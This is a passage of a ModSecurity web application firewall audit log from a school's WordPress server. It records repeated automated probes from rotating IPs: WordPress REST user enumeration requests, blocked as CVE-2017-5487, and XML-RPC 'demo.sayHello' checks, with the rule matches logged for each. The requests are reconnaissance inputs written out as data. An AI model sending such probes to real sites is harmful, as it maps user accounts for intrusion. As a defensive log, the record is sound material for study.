"%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465161674919 2822 (- - -) Stopwatch2: 1746465161674919 2822; combined=1470, p1=484, p2=949, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ac9eb39-Z-- --57289249-A-- [06/May/2025:00:12:44 +0700] aBjxjARwKNFSM6B7_LaoRQAAAJU 103.236.140.4 52448 103.236.140.4 8181 --57289249-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57289249-C-- demo.sayHello --57289249-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57289249-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465164460012 6974 (- - -) Stopwatch2: 1746465164460012 6974; combined=5168, p1=657, p2=4263, p3=38, p4=37, p5=102, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57289249-Z-- --4bfc8844-A-- [06/May/2025:00:22:23 +0700] aBjzz4ZWvR7-42f6JrAWIQAAAMo 103.236.140.4 57086 103.236.140.4 8181 --4bfc8844-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bfc8844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bfc8844-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465743916260 2891 (- - -) Stopwatch2: 1746465743916260 2891; combined=1259, p1=406, p2=819, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bfc8844-Z-- --bb15a325-A-- [06/May/2025:00:22:24 +0700] aBjz0IZWvR7-42f6JrAWJAAAANQ 103.236.140.4 57096 103.236.140.4 8181 --bb15a325-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb15a325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb15a325-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465744921968 2783 (- - -) Stopwatch2: 1746465744921968 2783; combined=1265, p1=433, p2=802, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb15a325-Z-- --a7bd4971-A-- [06/May/2025:00:22:28 +0700] aBjz1PZJDMuQndL03JNndQAAAEs 103.236.140.4 57134 103.236.140.4 8181 --a7bd4971-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7bd4971-C-- demo.sayHello --a7bd4971-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7bd4971-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465748209460 6550 (- - -) Stopwatch2: 1746465748209460 6550; combined=4709, p1=589, p2=3894, p3=36, p4=40, p5=89, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7bd4971-Z-- --c5d87a26-A-- [06/May/2025:00:22:28 +0700] aBjz1PZJDMuQndL03JNndwAAAEk 103.236.140.4 57140 103.236.140.4 8181 --c5d87a26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5d87a26-C-- demo.sayHello --c5d87a26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5d87a26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465748570044 4885 (- - -) Stopwatch2: 1746465748570044 4885; combined=3646, p1=507, p2=2949, p3=27, p4=29, p5=79, sr=107, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d87a26-Z-- --ad003b1f-A-- [06/May/2025:00:23:06 +0700] aBjz-oZWvR7-42f6JrAWRAAAANg 103.236.140.4 57432 103.236.140.4 8181 --ad003b1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad003b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad003b1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465786601826 2828 (- - -) Stopwatch2: 1746465786601826 2828; combined=1268, p1=445, p2=794, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad003b1f-Z-- --cbdc510c-A-- [06/May/2025:00:23:10 +0700] aBjz_k2V_h1VFAgsfgaIkAAAAAk 103.236.140.4 57468 103.236.140.4 8181 --cbdc510c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cbdc510c-C-- demo.sayHello --cbdc510c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdc510c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465790199935 5280 (- - -) Stopwatch2: 1746465790199935 5280; combined=4280, p1=532, p2=3525, p3=31, p4=36, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdc510c-Z-- --44033916-A-- [06/May/2025:00:23:31 +0700] aBj0E4ZWvR7-42f6JrAWUwAAAMs 103.236.140.4 57636 103.236.140.4 8181 --44033916-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44033916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44033916-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465811500505 2569 (- - -) Stopwatch2: 1746465811500505 2569; combined=1247, p1=398, p2=819, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44033916-Z-- --9286e618-A-- [06/May/2025:00:23:34 +0700] aBj0FgRwKNFSM6B7_LapCQAAAIU 103.236.140.4 57664 103.236.140.4 8181 --9286e618-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9286e618-C-- demo.sayHello --9286e618-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9286e618-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465814957347 5950 (- - -) Stopwatch2: 1746465814957347 5950; combined=4430, p1=546, p2=3652, p3=32, p4=35, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9286e618-Z-- --5e678411-A-- [06/May/2025:00:24:53 +0700] aBj0ZfZJDMuQndL03JNnxgAAAFE 103.236.140.4 58330 103.236.140.4 8181 --5e678411-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e678411-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e678411-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465893279668 2753 (- - -) Stopwatch2: 1746465893279668 2753; combined=1216, p1=416, p2=771, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e678411-Z-- --50005f56-A-- [06/May/2025:00:24:56 +0700] aBj0aARwKNFSM6B7_LapLAAAAJQ 103.236.140.4 58358 103.236.140.4 8181 --50005f56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --50005f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50005f56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465896475677 2861 (- - -) Stopwatch2: 1746465896475677 2861; combined=1311, p1=409, p2=868, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50005f56-Z-- --9a4f9332-A-- [06/May/2025:00:24:56 +0700] aBj0aPZJDMuQndL03JNnyAAAAE4 103.236.140.4 58364 103.236.140.4 8181 --9a4f9332-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a4f9332-C-- demo.sayHello --9a4f9332-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4f9332-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465896818151 4873 (- - -) Stopwatch2: 1746465896818151 4873; combined=3942, p1=513, p2=3202, p3=32, p4=34, p5=94, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4f9332-Z-- --e1d7c97e-A-- [06/May/2025:00:24:59 +0700] aBj0awRwKNFSM6B7_LapMQAAAIY 103.236.140.4 58390 103.236.140.4 8181 --e1d7c97e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e1d7c97e-C-- demo.sayHello --e1d7c97e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1d7c97e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465899378237 5917 (- - -) Stopwatch2: 1746465899378237 5917; combined=4392, p1=524, p2=3642, p3=32, p4=34, p5=94, sr=70, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1d7c97e-Z-- --d45f907a-A-- [06/May/2025:00:25:18 +0700] aBj0fvZJDMuQndL03JNn5AAAAEg 103.236.140.4 58554 103.236.140.4 8181 --d45f907a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d45f907a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d45f907a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465918667795 2749 (- - -) Stopwatch2: 1746465918667795 2749; combined=1234, p1=432, p2=762, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d45f907a-Z-- --d445c87e-A-- [06/May/2025:00:25:22 +0700] aBj0gvZJDMuQndL03JNn5gAAAE0 103.236.140.4 58586 103.236.140.4 8181 --d445c87e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.114 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d445c87e-C-- demo.sayHello --d445c87e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d445c87e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465922609761 5478 (- - -) Stopwatch2: 1746465922609761 5478; combined=4071, p1=530, p2=3328, p3=31, p4=34, p5=87, sr=73, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d445c87e-Z-- --54960028-A-- [06/May/2025:00:25:41 +0700] aBj0lfZJDMuQndL03JNoAAAAAE8 103.236.140.4 58760 103.236.140.4 8181 --54960028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --54960028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54960028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465941030307 2724 (- - -) Stopwatch2: 1746465941030307 2724; combined=1212, p1=409, p2=773, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54960028-Z-- --9d356c13-A-- [06/May/2025:00:25:44 +0700] aBj0mARwKNFSM6B7_LapNwAAAIo 103.236.140.4 58792 103.236.140.4 8181 --9d356c13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d356c13-C-- demo.sayHello --9d356c13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d356c13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 